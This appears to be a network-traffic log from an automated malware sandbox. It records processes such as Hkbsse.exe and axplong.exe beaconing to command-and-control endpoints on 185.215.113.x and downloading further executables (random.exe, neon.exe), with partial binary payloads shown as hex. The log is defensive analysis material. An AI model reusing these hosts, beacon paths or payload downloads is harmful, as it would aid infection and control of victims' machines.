Sep 27, 2024 04:21:37.791095972 CEST	1236	IN	Data Raw: 4d a6 cc f4 47 22 5e 2d 52 b2 54 00 13 77 ae e9 4e d4 0c 18 00 cd ab 46 f4 f5 ca ff 52 76 65 21 5f 5e 26 34 5f 0a 18 14 db eb 75 63 4f 24 41 b2 d8 de 57 40 06 19 00 16 84 59 c8 ff b3 75 14 e7 15 58 18 80 23 38 ea fd f2 2c da 44 ea c2 78 59 c5 84 Data Ascii: MG"^-RTwNFRve!_^&4_ucO$AW@YuX#8,DxYX" p!ZD7}X_sI%LNqAd[cf^\|ZV\&e2eVHsjA3qAbDek$%XJR6,nCOMNZ=<3
Sep 27, 2024 04:21:37.791106939 CEST	1236	IN	Data Raw: 4e fe 40 12 00 44 87 65 fa c0 93 08 99 cc 56 34 47 9c 58 46 21 14 5b 39 c2 30 0c 56 e9 55 af 05 7a 65 ce f3 4c b0 cd 86 e6 26 2f c7 e6 bb e4 5a 0b 9e fe 7c df 5d eb eb cc 90 7d 11 8a 45 99 b3 a7 63 60 14 26 51 42 d4 49 dd 38 99 b6 45 8c d7 6d 04 Data Ascii: N@DeV4GXF![90VUzeL&/Z\|]}Ec`&QBI8Ema3^~g:}RVpAMF_[S%AcEVU)X\|B"OQPZ\_p7%IKp4_9]2@_>~$z
Sep 27, 2024 04:21:37.791117907 CEST	1236	IN	Data Raw: cf 11 60 7f a3 fc a3 9f d4 da 04 74 22 c9 66 e1 ce e4 61 b4 5e c6 57 53 00 d0 67 e1 4d 96 d8 e2 de 11 54 3f 42 b3 61 30 ba 5b b7 f6 e5 41 5d 11 5a dd 24 6c ea 5b 90 d3 6d fa 5d 87 42 01 0b e1 ed 5b 4c e6 25 7a 88 a7 e0 67 7c 5b 63 63 8f bf c6 bd Data Ascii: `t"fa^WSgMT?Ba0[A]Z$l[m]B[L%zg\|[ccRH+\]:tU2fu]#`R/+U`O&Sye'_$X?4^f`T\fX]}j00B]?B\v_F>]o"}[$2lL\|V{
Sep 27, 2024 04:21:37.791131020 CEST	1236	IN	Data Raw: 87 1a 5d df 31 42 7f bd 31 1c b5 57 42 d3 d8 f1 df f4 c9 72 82 e2 e4 e8 ff 69 67 d8 45 b2 e4 33 7e dc 14 e0 ad cc d0 19 ee eb bc af 42 d3 38 f2 94 f3 8c 17 09 c2 88 ff d5 a4 56 8d 59 d3 e0 b2 43 e2 6c e8 ff f5 67 74 51 66 a6 dc 0d 49 5d 1f 46 46 Data Ascii: ]1B1WBrigE3~B8VYClgtQfI]FF(HW1tgis t@Z_zU]WZucgMnV]=:2]+B!M\+dt]]]O>Hvjm/w6VetO-
Sep 27, 2024 04:21:37.791141033 CEST	1236	IN	Data Raw: 56 dc ec e0 08 d6 fc 53 9b 82 25 e0 85 42 76 b3 56 76 42 9a 96 d3 54 b3 46 d3 95 6f ca a9 c8 11 ba 2a d2 c2 2b 91 cc 0f 0c 6b 55 b6 c5 42 bc 42 77 ca 84 5f d7 dc 12 66 c6 85 53 0f 5f d3 94 d7 72 48 8f 5f 4a 28 a4 70 d7 2d 4c 6b 4c 08 64 01 75 42 Data Ascii: VS%BvVvBTFo+kUBBw_fS_rH_J(p-LkLduBM~&V;HDi Rsqf`'\|,dU]BcvfdH+VS?yyuF_1gXQF>]k)}]&0{R]"_vLKLG]BP
Sep 27, 2024 04:21:37.791152954 CEST	1236	IN	Data Raw: 29 ce fd de 84 41 b9 93 f1 76 c0 e3 ae ad e9 ee cd 52 a3 11 d6 e1 f9 e4 d8 44 c1 d7 ed 2e ea f6 1c 18 b7 af de 89 65 27 c9 e0 1d dc 65 48 c5 a2 c5 66 a9 a7 38 fa 39 21 5b 26 f4 23 ce fa cf 6f 43 77 80 20 b4 12 51 1f c5 c6 a7 4c 3e c0 64 37 90 c7 Data Ascii: )AvRD.e'eHf89![&#oCw QL>d76.'xO\TZfy38wi90C&sP9EO]~P>:HkveR;Pa0I'Zx8c}.9]X\J&0C$f\BeN^lT#DeVf
Sep 27, 2024 04:21:37.796883106 CEST	1236	IN	Data Raw: a8 f6 ec 01 26 9c dd 93 4e 26 c8 46 13 be ac b2 b4 ac 6c 39 cb fc 2a 0e 8e 5b a1 e2 a4 92 36 20 5f c7 2e dc a1 b4 87 59 2f ac 9d bf fb a1 28 96 8d ab e0 ba 1c ff 34 95 c4 d1 38 12 b4 ca 56 08 65 6e 3a 41 7d 10 60 05 b1 c3 21 c6 d3 d3 09 e6 d0 ec Data Ascii: &N&Fl9*[6 _.Y/(48Ven:A}`!>PNJE?#%J[<,AclUe{Z\s!OjId2KD#RB!}U$IXvBNYYe4SP!Mgs=fMIbno,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49760	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:38.359677076 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:39.063846111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:39.161262035 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:39.393877029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49762	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:39.602582932 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:40.404690027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:40.598401070 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:40.829926968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49763	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:40.619419098 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000354001&unit=246122658369
Sep 27, 2024 04:21:41.326980114 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49765	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:41.050734043 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:41.711424112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:41.783025980 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:42.010270119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49766	185.215.113.103	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:41.448585033 CEST	56	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.103
Sep 27, 2024 04:21:42.150799036 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:42 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 27 Sep 2024 02:17:24 GMT ETag: "1d7200-6231074af51cc" Accept-Ranges: bytes Content-Length: 1929728 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfL@L`@WkL@L @.rsrc@.idata @ +@ewzoukzh`02X@eahzsgudLL@.taggant0L"P@
Sep 27, 2024 04:21:42.150815964 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:42.150830030 CEST	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:42.150840998 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:42.150851011 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ^*y&PijzwQ0VXd9
Sep 27, 2024 04:21:42.150861979 CEST	1236	IN	Data Raw: 88 08 fd 98 be 88 51 94 e4 99 39 8a 7e 8b c8 bd e6 c8 5d d0 d2 bf 35 39 a9 60 4d 28 9f 75 ea 4a 8f 1c 3f e8 a2 b9 59 19 ed 78 4e a5 c5 48 5e 70 07 35 51 64 7e 88 5e 18 1b ba fd c1 77 aa 81 fe eb 19 b9 e9 fe cb 75 e5 b7 20 b5 45 cb b8 2c 54 cd 18 Data Ascii: Q9~]59`M(uJ?YxNH^p5Qd~^wu E,TMr69]=.tN,^HL~Wg_-D55yAdUTVNmYU4L(YMuv]L>Wi(I+iSM8]I5
Sep 27, 2024 04:21:42.150875092 CEST	1236	IN	Data Raw: 70 10 bf 52 c4 95 b9 01 f3 3b 7e 95 76 99 d6 0b 4a 53 1d 75 72 1a 37 30 a0 5a fc 78 39 2a be 45 02 11 f3 98 d8 c5 ef c5 c2 45 7a 52 24 2b 0b 4a 5e df bb 99 9d 60 81 44 09 8a 14 70 cd 86 9e 5b 53 3d 4d 94 d8 16 16 16 50 1a 0e 5b 6b 0d 0d 81 06 3e Data Ascii: pR;~vJSur70Zx9*EEzR$+J^`Dp[S=MP[k>!^!K6EYTOTA0d\-VpTM-#Hu:b<:r!`8j?wJ-MoEAHdHnTHs=Y;("Ghd
Sep 27, 2024 04:21:42.150885105 CEST	1236	IN	Data Raw: 87 3a 4e 9a 1a e1 c6 91 9f 4b 76 98 ba 86 2e d1 83 75 de e8 fa e4 63 8f 91 50 24 4e c9 0a 26 f2 ea 63 1c 5a 53 6c ba 98 a1 aa 7b 31 8c 84 30 1c ea e3 07 c6 1e b8 52 77 02 b1 3d 1d 8a 63 79 08 bf 7b b9 aa c0 5a 30 db 55 5a 75 76 55 a3 ed 74 6f 3d Data Ascii: :NKv.ucP$N&cZSl{10Rw=cy{Z0UZuvUto=Y{1Q.X3:`ppu8;wl[6vPZ^F` +\|iNa:NO3!_G~8Iq>kQo;*a&=vrkspyb\|0z
Sep 27, 2024 04:21:42.150896072 CEST	1236	IN	Data Raw: 1e 47 b8 ea 16 d8 62 dc 83 aa c3 eb 1e 45 49 aa 16 9b a6 15 08 d9 22 cb 79 0c cf a8 99 4d 69 d5 7a 58 79 9b 5a 44 3f 74 f1 e0 3a 91 a4 69 9c 8e 6a a3 c1 bd c6 05 7b d4 8a 8a e4 3d 8e ea 39 05 0f 9a 08 48 53 5f b5 a6 93 6a b7 42 0b 60 cf cb f4 e5 Data Ascii: GbEI"yMizXyZD?t:ij{=9HS_jB``T+E%+?(Fk&hLQR\,20O0%+8)/3^]{_0L[0@@gA:+pI(YM0P
Sep 27, 2024 04:21:42.150906086 CEST	1236	IN	Data Raw: ef 25 7e 1a 49 4d 02 2b b6 e0 73 f9 f5 f3 07 fb 0d d6 33 fe bb 4d 1e 88 c7 1f 4c 4d 88 2f f2 92 d3 b5 99 dd 7e c8 79 b3 de 57 d2 de 7d ad e2 8f dc 04 be 91 40 f4 89 10 53 b3 80 1c f3 c8 dd db 26 ac 14 bb 55 9e 51 f2 f5 e6 7e d0 01 15 f8 95 7f c2 Data Ascii: %~IM+s3MLM/~yW}@S&UQ~xH];Z]:h<WR^)A_:Y$c(l${Et93RV}/[(DjmJK]@'
Sep 27, 2024 04:21:42.155750036 CEST	1236	IN	Data Raw: fc 98 38 28 86 60 c0 63 31 17 f8 92 ab 46 b2 cb 09 10 a4 ce cf 08 b7 51 17 6a dd b4 16 aa 3e b8 35 27 98 4c 5b 61 13 eb 38 62 cb 94 e3 d4 4d d6 14 ea a5 da 6f da a6 aa c1 34 85 f1 88 64 ae 2f 96 ab b4 48 31 5a 78 0b ac 50 ad f0 b9 9a a4 cd 24 ba Data Ascii: 8(`c1FQj>5'L[a8bMo4d/H1ZxP$X0VEHi]G&.^"TapX)[0o1u`\b3"?]uB0U45=BbJJbAJr6VPDcB>S_h`y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49769	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:42.142299891 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:42.854861975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:42.857419968 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:43.094243050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49771	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:43.308554888 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:44.009838104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:44.011286974 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:44.239038944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49773	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:44.361176968 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:45.090244055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:45.094036102 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:45.324085951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49774	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:44.704541922 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000355001&unit=246122658369
Sep 27, 2024 04:21:45.407063007 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:45.812777996 CEST	52	OUT	GET /inc/neon.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:46.036129951 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:45 GMT Content-Type: application/octet-stream Content-Length: 3643904 Last-Modified: Thu, 26 Sep 2024 19:28:15 GMT Connection: keep-alive ETag: "66f5b5cf-379a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 